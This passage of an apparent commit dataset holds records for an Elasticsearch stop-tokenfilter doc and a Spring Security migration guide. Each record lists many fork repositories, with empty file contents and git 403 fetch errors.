elasticsearch,hanswang\/elasticsearch,jpountz\/elasticsearch,smflorentino\/elasticsearch,alexshadow007\/elasticsearch,snikch\/elasticsearch,achow\/elasticsearch,Clairebi\/ElasticsearchClone,ImpressTV\/elasticsearch,knight1128\/elasticsearch,mgalushka\/elasticsearch,jchampion\/elasticsearch,davidvgalbraith\/elasticsearch,Asimov4\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,vrkansagara\/elasticsearch,robin13\/elasticsearch,luiseduardohdbackup\/elasticsearch,jango2015\/elasticsearch,scottsom\/elasticsearch,ricardocerq\/elasticsearch,liweinan0423\/elasticsearch,amaliujia\/elasticsearch,coding0011\/elasticsearch,pablocastro\/elasticsearch,brwe\/elasticsearch,acchen97\/elasticsearch,adrianbk\/elasticsearch,mute\/elasticsearch,socialrank\/elasticsearch,codebunt\/elasticsearch,koxa29\/elasticsearch,AleksKochev\/elasticsearch,myelin\/elasticsearch,smflorentino\/elasticsearch,btiernay\/elasticsearch,rmuir\/elasticsearch,huanzhong\/elasticsearch,j
anmejay\/elasticsearch,franklanganke\/elasticsearch,queirozfcom\/elasticsearch,combinatorist\/elasticsearch,gfyoung\/elasticsearch,nellicus\/elasticsearch,kalimatas\/elasticsearch,Fsero\/elasticsearch,a2lin\/elasticsearch,Liziyao\/elasticsearch,dongjoon-hyun\/elasticsearch,kevinkluge\/elasticsearch,ImpressTV\/elasticsearch,easonC\/elasticsearch,kenshin233\/elasticsearch,Ansh90\/elasticsearch,easonC\/elasticsearch,MjAbuz\/elasticsearch,ckclark\/elasticsearch,mohit\/elasticsearch,IanvsPoplicola\/elasticsearch,jsgao0\/elasticsearch,vietlq\/elasticsearch,fforbeck\/elasticsearch,elasticdog\/elasticsearch,jango2015\/elasticsearch,Shekharrajak\/elasticsearch,smflorentino\/elasticsearch,mm0\/elasticsearch,Liziyao\/elasticsearch,feiqitian\/elasticsearch,ricardocerq\/elasticsearch,nomoa\/elasticsearch,caengcjd\/elasticsearch,ThalaivaStars\/OrgRepo1,njlawton\/elasticsearch,golubev\/elasticsearch,opendatasoft\/elasticsearch,i-am-Nathan\/elasticsearch,thecocce\/elasticsearch,vingupta3\/elasticsearch,kevinkluge\/elasticsearch,szroland\/elasticsearch,Liziyao\/elasticsearch,MaineC\/elasticsearch,franklanganke\/elasticsearch,MisterAndersen\/elasticsearch,alexkuk\/elasticsearch,linglaiyao1314\/elasticsearch,sneivandt\/elasticsearch,himanshuag\/elasticsearch,umeshdangat\/elasticsearch,koxa29\/elasticsearch,apepper\/elasticsearch,davidvgalbraith\/elasticsearch,acchen97\/elasticsearch,ulkas\/elasticsearch,Kakakakakku\/elasticsearch,wbowling\/elasticsearch,LewayneNaidoo\/elasticsearch,Uiho\/elasticsearch,xingguang2013\/elasticsearch,JackyMai\/elasticsearch,PhaedrusTheGreek\/elasticsearch,kimimj\/elasticsearch,himanshuag\/elasticsearch,mjason3\/elasticsearch,vietlq\/elasticsearch,milodky\/elasticsearch,maddin2016\/elasticsearch,ZTE-PaaS\/elasticsearch,mute\/elasticsearch,mm0\/elasticsearch,anti-social\/elasticsearch,mjason3\/elasticsearch,mjhennig\/elasticsearch,yanjunh\/elasticsearch,naveenhooda2000\/elasticsearch,achow\/elasticsearch,socialrank\/elasticsearch,KimTaehee\/elasticsearch,kunallimaye\/elasticsearch,zhaocloud\/elasticsearch,wittyameta\/elasticsearch,sreeramjayan\/elasticsearch,lchennup\/elasticsearch,codebunt\/elasticsearch,TonyChai24\/ESSource,ckclark\/elasticsearch,mnylen\/elasticsearch,amit-shar\/elasticsearch,lks21c\/elasticsearch,fernandozhu\/elasticsearch,boliza\/elasticsearch,skearns64\/elasticsearch,VukDukic\/elasticsearch,btiernay\/elasticsearch,sjohnr\/elasticsearch,JSCooke\/elasticsearch,MichaelLiZhou\/elasticsearch,JackyMai\/elasticsearch,hanswang\/elasticsearch,F0lha\/elasticsearch,KimTaehee\/elasticsearch,pritishppai\/elasticsearch,nrkkalyan\/elasticsearch,jprante\/elasticsearch,humandb\/elasticsearch,acchen97\/elasticsearch,abibell\/elasticsearch,vietlq\/elasticsearch,sc0ttkclark\/elasticsearch,HonzaKral\/elasticsearch,alexshadow007\/elasticsearch,infusionsoft\/elasticsearch,fooljohnny\/elasticsearch,opendatasoft\/elasticsearch,iantruslove\/elasticsearch,jimhooker2002\/elasticsearch,episerver\/elasticsearch,wuranbo\/elasticsearch,humandb\/elasticsearch,Widen\/elasticsearch,winstonewert\/elasticsearch,weipinghe\/elasticsearch,wangyuxue\/elasticsearch,queirozfcom\/elasticsearch,F0lha\/elasticsearch,weipinghe\/elasticsearch,brandonkearby\/elasticsearch,bestwpw\/elasticsearch,MichaelLiZhou\/elasticsearch,tsohil\/elasticsearch,tsohil\/elasticsearch,obourgain\/elasticsearch,avikurapati\/elasticsearch,thecocce\/elasticsearch,mbrukman\/elasticsearch,robin13\/elasticsearch,markllama\/elasticsearch,awislowski\/elasticsearch,pablocastro\/elasticsearch,rento19962\/elasticsearch,HonzaKral\/elastics
earch,infusionsoft\/elasticsearch,amit-shar\/elasticsearch,humandb\/elasticsearch,Collaborne\/elasticsearch,MetSystem\/elasticsearch,wangyuxue\/elasticsearch,opendatasoft\/elasticsearch,pozhidaevak\/elasticsearch,weipinghe\/elasticsearch,Stacey-Gammon\/elasticsearch,lmtwga\/elasticsearch,nezirus\/elasticsearch,abhijitiitr\/es,onegambler\/elasticsearch,schonfeld\/elasticsearch,pranavraman\/elasticsearch,jprante\/elasticsearch,polyfractal\/elasticsearch,bestwpw\/elasticsearch,pranavraman\/elasticsearch,shreejay\/elasticsearch,alexkuk\/elasticsearch,jw0201\/elastic,bestwpw\/elasticsearch,mrorii\/elasticsearch,sc0ttkclark\/elasticsearch,awislowski\/elasticsearch,nrkkalyan\/elasticsearch,mjhennig\/elasticsearch,Collaborne\/elasticsearch,andrejserafim\/elasticsearch,ZTE-PaaS\/elasticsearch,nellicus\/elasticsearch,pranavraman\/elasticsearch,kubum\/elasticsearch,kingaj\/elasticsearch,artnowo\/elasticsearch,hydro2k\/elasticsearch,wayeast\/elasticsearch,KimTaehee\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,obourgain\/elasticsearch,phani546\/elasticsearch,kubum\/elasticsearch,phani546\/elasticsearch,martinstuga\/elasticsearch,jaynblue\/elasticsearch,pritishppai\/elasticsearch,wenpos\/elasticsearch,amaliujia\/elasticsearch,masaruh\/elasticsearch,tsohil\/elasticsearch,strapdata\/elassandra,cwurm\/elasticsearch,szroland\/elasticsearch,dongjoon-hyun\/elasticsearch,koxa29\/elasticsearch,artnowo\/elasticsearch,rmuir\/elasticsearch,achow\/elasticsearch,dongjoon-hyun\/elasticsearch,brwe\/elasticsearch,jeteve\/elasticsearch,Uiho\/elasticsearch,chrismwendt\/elasticsearch,Shekharrajak\/elasticsearch,Flipkart\/elasticsearch,ricardocerq\/elasticsearch,Helen-Zhao\/elasticsearch,mbrukman\/elasticsearch,glefloch\/elasticsearch,rajanm\/elasticsearch,markharwood\/elasticsearch,adrianbk\/elasticsearch,rhoml\/elasticsearch,NBSW\/elasticsearch,sneivandt\/elasticsearch,davidvgalbraith\/elasticsearch,andrestc\/elasticsearch,lydonchandra\/elasticsearch,tahaemin\/elasticsearch,yuy168\/elasticsearch,slavau\/elasticsearch,weipinghe\/elasticsearch,knight1128\/elasticsearch,Uiho\/elasticsearch,nilabhsagar\/elasticsearch,JackyMai\/elasticsearch,kkirsche\/elasticsearch,tebriel\/elasticsearch,Ansh90\/elasticsearch,truemped\/elasticsearch,pablocastro\/elasticsearch,yuy168\/elasticsearch,Brijeshrpatel9\/elasticsearch,fooljohnny\/elasticsearch,lzo\/elasticsearch-1,davidvgalbraith\/elasticsearch,jeteve\/elasticsearch,yynil\/elasticsearch,phani546\/elasticsearch,LeoYao\/elasticsearch,ajhalani\/elasticsearch,scorpionvicky\/elasticsearch,aglne\/elasticsearch,TonyChai24\/ESSource,kaneshin\/elasticsearch,bestwpw\/elasticsearch,vietlq\/elasticsearch,EasonYi\/elasticsearch,davidvgalbraith\/elasticsearch,Charlesdong\/elasticsearch,MaineC\/elasticsearch,djschny\/elasticsearch,andrestc\/elasticsearch,Siddartha07\/elasticsearch,sc0ttkclark\/elasticsearch,sneivandt\/elasticsearch,hanswang\/elasticsearch,ajhalani\/elasticsearch,vingupta3\/elasticsearch,dpursehouse\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,hirdesh2008\/elasticsearch,tebriel\/elasticsearch,robin13\/elasticsearch,sreeramjayan\/elasticsearch,Widen\/elasticsearch,JervyShi\/elasticsearch,mute\/elasticsearch,janmejay\/elasticsearch,scorpionvicky\/elasticsearch,onegambler\/elasticsearch,mm0\/elasticsearch,elasticdog\/elasticsearch,pablocastro\/elasticsearch,mjhennig\/elasticsearch,EasonYi\/elasticsearch,Liziyao\/elasticsearch,wangtuo\/elasticsearch,nellicus\/elasticsearch,dylan8902\/elasticsearch,szroland\/elasticsearch,snikch\/elasticsearch,sposam\/elasticsearch,AndreKR\/ela
sticsearch,MetSystem\/elasticsearch,adrianbk\/elasticsearch,sdauletau\/elasticsearch,rajanm\/elasticsearch,wuranbo\/elasticsearch,petmit\/elasticsearch,vvcephei\/elasticsearch,masterweb121\/elasticsearch,yongminxia\/elasticsearch,YosuaMichael\/elasticsearch,sposam\/elasticsearch,masterweb121\/elasticsearch,episerver\/elasticsearch,strapdata\/elassandra-test,javachengwc\/elasticsearch,diendt\/elasticsearch,LeoYao\/elasticsearch,coding0011\/elasticsearch,smflorentino\/elasticsearch,Widen\/elasticsearch,caengcjd\/elasticsearch,scottsom\/elasticsearch,Charlesdong\/elasticsearch,18098924759\/elasticsearch,lightslife\/elasticsearch,masterweb121\/elasticsearch,palecur\/elasticsearch,lzo\/elasticsearch-1,lks21c\/elasticsearch,jaynblue\/elasticsearch,kunallimaye\/elasticsearch,MichaelLiZhou\/elasticsearch,szroland\/elasticsearch,socialrank\/elasticsearch,wuranbo\/elasticsearch,kunallimaye\/elasticsearch,sc0ttkclark\/elasticsearch,scorpionvicky\/elasticsearch,fred84\/elasticsearch,cnfire\/elasticsearch-1,nellicus\/elasticsearch,Microsoft\/elasticsearch,NBSW\/elasticsearch,Stacey-Gammon\/elasticsearch,mortonsykes\/elasticsearch,umeshdangat\/elasticsearch,szroland\/elasticsearch,Uiho\/elasticsearch,mnylen\/elasticsearch,AshishThakur\/elasticsearch,golubev\/elasticsearch,nazarewk\/elasticsearch,henakamaMSFT\/elasticsearch,jimhooker2002\/elasticsearch,micpalmia\/elasticsearch,anti-social\/elasticsearch,strapdata\/elassandra-test,fekaputra\/elasticsearch,robin13\/elasticsearch,drewr\/elasticsearch,Flipkart\/elasticsearch,fernandozhu\/elasticsearch,golubev\/elasticsearch,scorpionvicky\/elasticsearch,bestwpw\/elasticsearch,nknize\/elasticsearch,wangtuo\/elasticsearch,areek\/elasticsearch,mgalushka\/elasticsearch,18098924759\/elasticsearch,JSCooke\/elasticsearch,iantruslove\/elasticsearch,fekaputra\/elasticsearch,skearns64\/elasticsearch,gfyoung\/elasticsearch,mrorii\/elasticsearch,girirajsharma\/elasticsearch,markllama\/elasticsearch,Rygbee\/elasticsearch,iacdingping\/elasticsearch,JervyShi\/elasticsearch,strapdata\/elassandra5-rc,snikch\/elasticsearch,fred84\/elasticsearch,wenpos\/elasticsearch,mnylen\/elasticsearch,vroyer\/elasticassandra,zeroctu\/elasticsearch,kevinkluge\/elasticsearch,xuzha\/elasticsearch,nazarewk\/elasticsearch,Brijeshrpatel9\/elasticsearch,vroyer\/elasticassandra,weipinghe\/elasticsearch,lzo\/elasticsearch-1,s1monw\/elasticsearch,heng4fun\/elasticsearch,lightslife\/elasticsearch,geidies\/elasticsearch,franklanganke\/elasticsearch,hafkensite\/elasticsearch,Fsero\/elasticsearch,SergVro\/elasticsearch,18098924759\/elasticsearch,kaneshin\/elasticsearch,xuzha\/elasticsearch,karthikjaps\/elasticsearch,Uiho\/elasticsearch,mcku\/elasticsearch,milodky\/elasticsearch,zkidkid\/elasticsearch,ThalaivaStars\/OrgRepo1,gingerwizard\/elasticsearch,mkis-\/elasticsearch,infusionsoft\/elasticsearch,zeroctu\/elasticsearch,javachengwc\/elasticsearch,nezirus\/elasticsearch,queirozfcom\/elasticsearch,andrejserafim\/elasticsearch,skearns64\/elasticsearch,Asimov4\/elasticsearch,brwe\/elasticsearch,alexbrasetvik\/elasticsearch,diendt\/elasticsearch,beiske\/elasticsearch,amit-shar\/elasticsearch,wimvds\/elasticsearch,markharwood\/elasticsearch,lzo\/elasticsearch-1,kubum\/elasticsearch,episerver\/elasticsearch,pritishppai\/elasticsearch,vingupta3\/elasticsearch,lmtwga\/elasticsearch,kubum\/elasticsearch,sarwarbhuiyan\/elasticsearch,JSCooke\/elasticsearch,jsgao0\/elasticsearch,amit-shar\/elasticsearch,nomoa\/elasticsearch,mnylen\/elasticsearch,petabytedata\/elasticsearch,AshishThakur\/elasticsearch,wbowling\/elast
icsearch,xpandan\/elasticsearch,jango2015\/elasticsearch,hechunwen\/elasticsearch,iacdingping\/elasticsearch,trangvh\/elasticsearch,jbertouch\/elasticsearch,andrejserafim\/elasticsearch,PhaedrusTheGreek\/elasticsearch,iantruslove\/elasticsearch,ydsakyclguozi\/elasticsearch,camilojd\/elasticsearch,mkis-\/elasticsearch,MisterAndersen\/elasticsearch,yuy168\/elasticsearch,djschny\/elasticsearch,mjhennig\/elasticsearch,jango2015\/elasticsearch,kenshin233\/elasticsearch,aglne\/elasticsearch,mmaracic\/elasticsearch,hafkensite\/elasticsearch,hechunwen\/elasticsearch,jbertouch\/elasticsearch,vingupta3\/elasticsearch,JervyShi\/elasticsearch,xuzha\/elasticsearch,coding0011\/elasticsearch,iacdingping\/elasticsearch,clintongormley\/elasticsearch,jango2015\/elasticsearch,mcku\/elasticsearch,himanshuag\/elasticsearch,MjAbuz\/elasticsearch,mikemccand\/elasticsearch,maddin2016\/elasticsearch,tebriel\/elasticsearch,masterweb121\/elasticsearch,javachengwc\/elasticsearch,tcucchietti\/elasticsearch,EasonYi\/elasticsearch,milodky\/elasticsearch,lks21c\/elasticsearch,Brijeshrpatel9\/elasticsearch,caengcjd\/elasticsearch,scottsom\/elasticsearch,mjason3\/elasticsearch,kcompher\/elasticsearch,tahaemin\/elasticsearch,sc0ttkclark\/elasticsearch,AndreKR\/elasticsearch,kcompher\/elasticsearch,tkssharma\/elasticsearch,tebriel\/elasticsearch,mbrukman\/elasticsearch,mapr\/elasticsearch,sc0ttkclark\/elasticsearch,mjason3\/elasticsearch,ydsakyclguozi\/elasticsearch,ouyangkongtong\/elasticsearch,tahaemin\/elasticsearch,yongminxia\/elasticsearch,elancom\/elasticsearch,nezirus\/elasticsearch,rlugojr\/elasticsearch,iantruslove\/elasticsearch,awislowski\/elasticsearch,henakamaMSFT\/elasticsearch,LewayneNaidoo\/elasticsearch,YosuaMichael\/elasticsearch,chrismwendt\/elasticsearch,avikurapati\/elasticsearch,Helen-Zhao\/elasticsearch,davidvgalbraith\/elasticsearch,rento19962\/elasticsearch,schonfeld\/elasticsearch,infusionsoft\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,baishuo\/elasticsearch_v2.1.0-baishuo,zhaocloud\/elasticsearch,nazarewk\/elasticsearch,vroyer\/elassandra,tkssharma\/elasticsearch,ajhalani\/elasticsearch,jchampion\/elasticsearch,martinstuga\/elasticsearch,kcompher\/elasticsearch,dongjoon-hyun\/elasticsearch,myelin\/elasticsearch,likaiwalkman\/elasticsearch,overcome\/elasticsearch,ckclark\/elasticsearch,feiqitian\/elasticsearch,gingerwizard\/elasticsearch,mkis-\/elasticsearch,Chhunlong\/elasticsearch,uschindler\/elasticsearch,franklanganke\/elasticsearch,socialrank\/elasticsearch,sscarduzio\/elasticsearch,achow\/elasticsearch,SergVro\/elasticsearch,kcompher\/elasticsearch,Kakakakakku\/elasticsearch,F0lha\/elasticsearch,umeshdangat\/elasticsearch,karthikjaps\/elasticsearch,HarishAtGitHub\/elasticsearch,rlugojr\/elasticsearch,ouyangkongtong\/elasticsearch,kingaj\/elasticsearch,wayeast\/elasticsearch,AshishThakur\/elasticsearch,likaiwalkman\/elasticsearch,micpalmia\/elasticsearch,rlugojr\/elasticsearch,cwurm\/elasticsearch,obourgain\/elasticsearch,NBSW\/elasticsearch,karthikjaps\/elasticsearch,trangvh\/elasticsearch,huanzhong\/elasticsearch,episerver\/elasticsearch,jpountz\/elasticsearch,ydsakyclguozi\/elasticsearch,JSCooke\/elasticsearch,mm0\/elasticsearch,nrkkalyan\/elasticsearch,strapdata\/elassandra,palecur\/elasticsearch,martinstuga\/elasticsearch,diendt\/elasticsearch,wittyameta\/elasticsearch,njlawton\/elasticsearch,andrestc\/elasticsearch,Shekharrajak\/elasticsearch,hydro2k\/elasticsearch,obourgain\/elasticsearch,sauravmondallive\/elasticsearch,khiraiwa\/elasticsearch,petabytedata\/elasticsearch,drewr\/
elasticsearch,rmuir\/elasticsearch,linglaiyao1314\/elasticsearch,fred84\/elasticsearch,koxa29\/elasticsearch,phani546\/elasticsearch,hirdesh2008\/elasticsearch,rlugojr\/elasticsearch,chirilo\/elasticsearch,mohit\/elasticsearch,F0lha\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,mmaracic\/elasticsearch,xingguang2013\/elasticsearch,easonC\/elasticsearch,Brijeshrpatel9\/elasticsearch,jeteve\/elasticsearch,chrismwendt\/elasticsearch,yynil\/elasticsearch,yongminxia\/elasticsearch,thecocce\/elasticsearch,geidies\/elasticsearch,wimvds\/elasticsearch,xuzha\/elasticsearch,tkssharma\/elasticsearch,beiske\/elasticsearch,nomoa\/elasticsearch,koxa29\/elasticsearch,ckclark\/elasticsearch,markllama\/elasticsearch,petabytedata\/elasticsearch,jbertouch\/elasticsearch,LeoYao\/elasticsearch,mortonsykes\/elasticsearch,opendatasoft\/elasticsearch,hanst\/elasticsearch,Clairebi\/ElasticsearchClone,mbrukman\/elasticsearch,NBSW\/elasticsearch,masterweb121\/elasticsearch,fooljohnny\/elasticsearch,jimczi\/elasticsearch,rento19962\/elasticsearch,yanjunh\/elasticsearch,ydsakyclguozi\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,jpountz\/elasticsearch,btiernay\/elasticsearch,gmarz\/elasticsearch,vingupta3\/elasticsearch,fforbeck\/elasticsearch,Uiho\/elasticsearch,sreeramjayan\/elasticsearch,schonfeld\/elasticsearch,yynil\/elasticsearch,weipinghe\/elasticsearch,LeoYao\/elasticsearch,mohit\/elasticsearch,yongminxia\/elasticsearch,codebunt\/elasticsearch,schonfeld\/elasticsearch,AndreKR\/elasticsearch,wangtuo\/elasticsearch,lchennup\/elasticsearch,khiraiwa\/elasticsearch,ulkas\/elasticsearch,rajanm\/elasticsearch,dpursehouse\/elasticsearch,lmtwga\/elasticsearch,pranavraman\/elasticsearch,sdauletau\/elasticsearch,javachengwc\/elasticsearch,vietlq\/elasticsearch,polyfractal\/elasticsearch,xingguang2013\/elasticsearch,zeroctu\/elasticsearch,jimczi\/elasticsearch,yuy168\/elasticsearch,zeroctu\/elasticsearch,hydro2k\/elasticsearch,ESamir\/elasticsearch,ImpressTV\/elasticsearch,boliza\/elasticsearch,trangvh\/elasticsearch,kubum\/elasticsearch,rhoml\/elasticsearch,jango2015\/elasticsearch,overcome\/elasticsearch,dataduke\/elasticsearch,sposam\/elasticsearch,fekaputra\/elasticsearch,strapdata\/elassandra,LeoYao\/elasticsearch,GlenRSmith\/elasticsearch,alexbrasetvik\/elasticsearch,MjAbuz\/elasticsearch,milodky\/elasticsearch,kalburgimanjunath\/elasticsearch,smflorentino\/elasticsearch,sposam\/elasticsearch,kunallimaye\/elasticsearch,lchennup\/elasticsearch,rhoml\/elasticsearch,tcucchietti\/elasticsearch,humandb\/elasticsearch,ESamir\/elasticsearch,girirajsharma\/elasticsearch,ivansun1010\/elasticsearch,petabytedata\/elasticsearch,fforbeck\/elasticsearch,Siddartha07\/elasticsearch,avikurapati\/elasticsearch,pritishppai\/elasticsearch,jpountz\/elasticsearch,bestwpw\/elasticsearch,ThalaivaStars\/OrgRepo1,vrkansagara\/elasticsearch,lydonchandra\/elasticsearch,aglne\/elasticsearch,zhiqinghuang\/elasticsearch,areek\/elasticsearch,vvcephei\/elasticsearch,peschlowp\/elasticsearch,ImpressTV\/elasticsearch,rajanm\/elasticsearch,kenshin233\/elasticsearch,smflorentino\/elasticsearch,naveenhooda2000\/elasticsearch,fernandozhu\/elasticsearch,TonyChai24\/ESSource,ZTE-PaaS\/elasticsearch,KimTaehee\/elasticsearch,jbertouch\/elasticsearch,i-am-Nathan\/elasticsearch,huypx1292\/elasticsearch,rmuir\/elasticsearch,areek\/elasticsearch,MetSystem\/elasticsearch,weipinghe\/elasticsearch,Flipkart\/elasticsearch,StefanGor\/elasticsearch,abhijitiitr\/es,Rygbee\/elasticsearch,Shepard1212\/elasticsearch,areek\/elasticsearch,jimhooker2002\/elasticsearch
,SaiprasadKrishnamurthy\/elasticsearch,boliza\/elasticsearch,andrestc\/elasticsearch,iantruslove\/elasticsearch,mortonsykes\/elasticsearch,artnowo\/elasticsearch,wbowling\/elasticsearch,tebriel\/elasticsearch,trangvh\/elasticsearch,shreejay\/elasticsearch,aglne\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,kenshin233\/elasticsearch,luiseduardohdbackup\/elasticsearch,markharwood\/elasticsearch,uschindler\/elasticsearch,Shepard1212\/elasticsearch,MaineC\/elasticsearch,ouyangkongtong\/elasticsearch,naveenhooda2000\/elasticsearch,chirilo\/elasticsearch,mcku\/elasticsearch,ivansun1010\/elasticsearch,sjohnr\/elasticsearch,cnfire\/elasticsearch-1,wayeast\/elasticsearch,VukDukic\/elasticsearch,AshishThakur\/elasticsearch,sarwarbhuiyan\/elasticsearch,kalimatas\/elasticsearch,huanzhong\/elasticsearch,LewayneNaidoo\/elasticsearch,jbertouch\/elasticsearch,drewr\/elasticsearch,sauravmondallive\/elasticsearch,acchen97\/elasticsearch,obourgain\/elasticsearch,Clairebi\/ElasticsearchClone,zhaocloud\/elasticsearch,easonC\/elasticsearch,pozhidaevak\/elasticsearch,apepper\/elasticsearch,yanjunh\/elasticsearch,amit-shar\/elasticsearch,SergVro\/elasticsearch,a2lin\/elasticsearch,iamjakob\/elasticsearch,andrestc\/elasticsearch,khiraiwa\/elasticsearch,Collaborne\/elasticsearch,beiske\/elasticsearch,dylan8902\/elasticsearch,ckclark\/elasticsearch,camilojd\/elasticsearch,strapdata\/elassandra5-rc,YosuaMichael\/elasticsearch,springning\/elasticsearch,hirdesh2008\/elasticsearch,IanvsPoplicola\/elasticsearch,onegambler\/elasticsearch,brandonkearby\/elasticsearch,gingerwizard\/elasticsearch,masterweb121\/elasticsearch,heng4fun\/elasticsearch,elancom\/elasticsearch,kalburgimanjunath\/elasticsearch,AndreKR\/elasticsearch,hirdesh2008\/elasticsearch,lchennup\/elasticsearch,micpalmia\/elasticsearch,tsohil\/elasticsearch,alexkuk\/elasticsearch,wenpos\/elasticsearch,jango2015\/elasticsearch,mrorii\/elasticsearch,tsohil\/elasticsearch,mmaracic\/elasticsearch,luiseduardohdbackup\/elasticsearch,yynil\/elasticsearch,jchampion\/elasticsearch,elasticdog\/elasticsearch,tsohil\/elasticsearch,btiernay\/elasticsearch,wuranbo\/elasticsearch,gfyoung\/elasticsearch,hanswang\/elasticsearch,bestwpw\/elasticsearch,pritishppai\/elasticsearch,dantuffery\/elasticsearch,drewr\/elasticsearch,18098924759\/elasticsearch,HarishAtGitHub\/elasticsearch,Kakakakakku\/elasticsearch,socialrank\/elasticsearch,markllama\/elasticsearch,MetSystem\/elasticsearch,mjhennig\/elasticsearch,awislowski\/elasticsearch,mikemccand\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,coding0011\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,StefanGor\/elasticsearch,mgalushka\/elasticsearch,Shekharrajak\/elasticsearch,wuranbo\/elasticsearch,petmit\/elasticsearch,rlugojr\/elasticsearch,mkis-\/elasticsearch","old_file":"docs\/reference\/analysis\/tokenfilters\/stop-tokenfilter.asciidoc","new_file":"docs\/reference\/analysis\/tokenfilters\/stop-tokenfilter.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9b4cbff58c5482ff328fd971dcb3147bff05e2a2","subject":"SEC-2782: Additional Updates to Migration Guide from 3.x to 4.x","message":"SEC-2782: Additional Updates to Migration Guide from 3.x to 
4.x\n","repos":"zgscwjm\/spring-security,Peter32\/spring-security,jgrandja\/spring-security,zshift\/spring-security,rwinch\/spring-security,liuguohua\/spring-security,mrkingybc\/spring-security,hippostar\/spring-security,zhaoqin102\/spring-security,mparaz\/spring-security,mounb\/spring-security,likaiwalkman\/spring-security,zshift\/spring-security,follow99\/spring-security,fhanik\/spring-security,mounb\/spring-security,ollie314\/spring-security,jgrandja\/spring-security,cyratech\/spring-security,MatthiasWinzeler\/spring-security,panchenko\/spring-security,rwinch\/spring-security,adairtaosy\/spring-security,thomasdarimont\/spring-security,ractive\/spring-security,driftman\/spring-security,SanjayUser\/SpringSecurityPro,MatthiasWinzeler\/spring-security,MatthiasWinzeler\/spring-security,caiwenshu\/spring-security,Xcorpio\/spring-security,jmnarloch\/spring-security,wkorando\/spring-security,liuguohua\/spring-security,rwinch\/spring-security,mdeinum\/spring-security,ajdinhedzic\/spring-security,follow99\/spring-security,SanjayUser\/SpringSecurityPro,raindev\/spring-security,xingguang2013\/spring-security,raindev\/spring-security,eddumelendez\/spring-security,thomasdarimont\/spring-security,thomasdarimont\/spring-security,chinazhaoht\/spring-security,driftman\/spring-security,rwinch\/spring-security,MatthiasWinzeler\/spring-security,zhaoqin102\/spring-security,mounb\/spring-security,mparaz\/spring-security,pkdevbox\/spring-security,adairtaosy\/spring-security,olezhuravlev\/spring-security,diegofernandes\/spring-security,pwheel\/spring-security,mrkingybc\/spring-security,SanjayUser\/SpringSecurityPro,mounb\/spring-security,kazuki43zoo\/spring-security,diegofernandes\/spring-security,Peter32\/spring-security,caiwenshu\/spring-security,zgscwjm\/spring-security,ollie314\/spring-security,hippostar\/spring-security,yinhe402\/spring-security,diegofernandes\/spring-security,kazuki43zoo\/spring-security,olezhuravlev\/spring-security,olezhuravlev\/spring-security,eddumelendez\/spring-security,eddumelendez\/spring-security,jgrandja\/spring-security,jgrandja\/spring-security,mparaz\/spring-security,fhanik\/spring-security,driftman\/spring-security,Xcorpio\/spring-security,djechelon\/spring-security,rwinch\/spring-security,fhanik\/spring-security,Krasnyanskiy\/spring-security,mdeinum\/spring-security,forestqqqq\/spring-security,ractive\/spring-security,ajdinhedzic\/spring-security,ollie314\/spring-security,Peter32\/spring-security,ractive\/spring-security,kazuki43zoo\/spring-security,yinhe402\/spring-security,kazuki43zoo\/spring-security,likaiwalkman\/spring-security,kazuki43zoo\/spring-security,diegofernandes\/spring-security,spring-projects\/spring-security,SanjayUser\/SpringSecurityPro,ractive\/spring-security,panchenko\/spring-security,raindev\/spring-security,mdeinum\/spring-security,wkorando\/spring-security,spring-projects\/spring-security,jmnarloch\/spring-security,mrkingybc\/spring-security,hippostar\/spring-security,djechelon\/spring-security,pwheel\/spring-security,eddumelendez\/spring-security,jgrandja\/spring-security,Krasnyanskiy\/spring-security,driftman\/spring-security,forestqqqq\/spring-security,liuguohua\/spring-security,spring-projects\/spring-security,adairtaosy\/spring-security,spring-projects\/spring-security,cyratech\/spring-security,thomasdarimont\/spring-security,xingguang2013\/spring-security,SanjayUser\/SpringSecurityPro,mdeinum\/spring-security,eddumelendez\/spring-security,pkdevbox\/spring-security,Peter32\/spring-security,zgscwjm\/spring-security,caiwenshu\/spring-security,Krasn
yanskiy\/spring-security,fhanik\/spring-security,zhaoqin102\/spring-security,panchenko\/spring-security,panchenko\/spring-security,olezhuravlev\/spring-security,Xcorpio\/spring-security,forestqqqq\/spring-security,wkorando\/spring-security,pwheel\/spring-security,likaiwalkman\/spring-security,caiwenshu\/spring-security,spring-projects\/spring-security,jgrandja\/spring-security,wkorando\/spring-security,cyratech\/spring-security,pwheel\/spring-security,fhanik\/spring-security,chinazhaoht\/spring-security,adairtaosy\/spring-security,yinhe402\/spring-security,jmnarloch\/spring-security,follow99\/spring-security,fhanik\/spring-security,likaiwalkman\/spring-security,zgscwjm\/spring-security,Krasnyanskiy\/spring-security,djechelon\/spring-security,mparaz\/spring-security,hippostar\/spring-security,xingguang2013\/spring-security,spring-projects\/spring-security,rwinch\/spring-security,pwheel\/spring-security,yinhe402\/spring-security,chinazhaoht\/spring-security,ajdinhedzic\/spring-security,spring-projects\/spring-security,forestqqqq\/spring-security,follow99\/spring-security,jmnarloch\/spring-security,djechelon\/spring-security,liuguohua\/spring-security,pkdevbox\/spring-security,xingguang2013\/spring-security,zhaoqin102\/spring-security,zshift\/spring-security,cyratech\/spring-security,mrkingybc\/spring-security,thomasdarimont\/spring-security,Xcorpio\/spring-security,djechelon\/spring-security,olezhuravlev\/spring-security,ajdinhedzic\/spring-security,zshift\/spring-security,chinazhaoht\/spring-security,ollie314\/spring-security,pkdevbox\/spring-security,raindev\/spring-security","old_file":"docs\/manual\/src\/docs\/asciidoc\/_includes\/migrate-3-to-4.adoc","new_file":"docs\/manual\/src\/docs\/asciidoc\/_includes\/migrate-3-to-4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jmnarloch\/spring-security.git\/': The requested URL returned error: 